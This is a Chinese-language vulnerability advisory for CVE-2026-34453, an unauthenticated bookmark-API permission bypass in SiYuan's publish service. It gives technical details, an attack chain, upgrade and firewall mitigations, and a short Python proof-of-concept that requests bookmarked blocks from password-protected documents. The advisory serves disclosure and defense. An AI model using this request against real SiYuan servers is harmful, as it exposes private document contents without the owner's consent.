IPBUF安全漏洞报告
English
CVE-2026-34453 CVSS 7.5 高危

CVE-2026-34453 SiYuan权限绕过漏洞

披露日期: 2026-03-31

漏洞信息

漏洞编号
CVE-2026-34453
漏洞类型
权限绕过
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
SiYuan

相关标签

权限绕过信息泄露SiYuanCVE-2026-34453访问控制失效

漏洞概述

SiYuan是一款个人知识管理系统。在3.6.2版本之前,其发布服务存在安全缺陷,导致受密码保护文档中的书签块内容被暴露给未经身份验证的访问者。攻击者无需密码即可获取特定文档内容。

技术细节

该漏洞位于SiYuan发布服务的 `/api/bookmark/getBookmark` API接口中。在发布或只读模式下,系统调用 `FilterBlocksByPublishAccess(nil, ...)` 函数来过滤书签块。由于逻辑错误,该函数错误地将 `nil` 上下文视为已授权用户,从而直接跳过了针对受保护文档的发布密码验证机制。只要文档中包含被书签标记的块,攻击者即可在不提供密码的情况下,直接调用该API获取受保护文档的特定块内容。这属于典型的权限绕过漏洞,导致本应受限制的文档内容被非授权访问。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标运行的是SiYuan知识管理系统,且版本低于3.6.2。
STEP 2
2. 探测服务
攻击者访问目标系统的发布服务端口(默认为6806),确认/api/bookmark/getBookmark接口可访问。
STEP 3
3. 发起攻击
攻击者向/api/bookmark/getBookmark发送请求。由于FilterBlocksByPublishAccess函数将nil上下文视为授权,系统跳过密码验证。
STEP 4
4. 获取数据
系统返回受保护文档中被书签标记的块内容,攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def verify_vulnerability(target_url): """ PoC for CVE-2026-34453 Attempts to retrieve bookmarked blocks from protected documents without authentication. """ endpoint = f"{target_url}/api/bookmark/getBookmark" headers = {"Content-Type": "application/json"} # The vulnerability allows unauthenticated access due to nil context handling # Sending a basic request structure expected by SiYuan API payload = { "mode": "local", "id": "any_bookmark_id" # If any bookmark exists } try: response = requests.post(endpoint, json=payload, headers=headers, timeout=5) if response.status_code == 200: print("[+] Vulnerability confirmed: Data retrieved without password.") print(response.text) else: print(f"[-] Target does not appear vulnerable or API structure changed. Status: {response.status_code}") except Exception as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": target = "http://127.0.0.1:6806" # Default SiYuan port verify_vulnerability(target)

影响范围

SiYuan < 3.6.2

防御指南

临时缓解措施
建议立即升级到修复版本。若暂时无法升级,应通过防火墙规则阻断对发布服务端口的非必要访问,或暂停发布功能以防止信息泄露。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表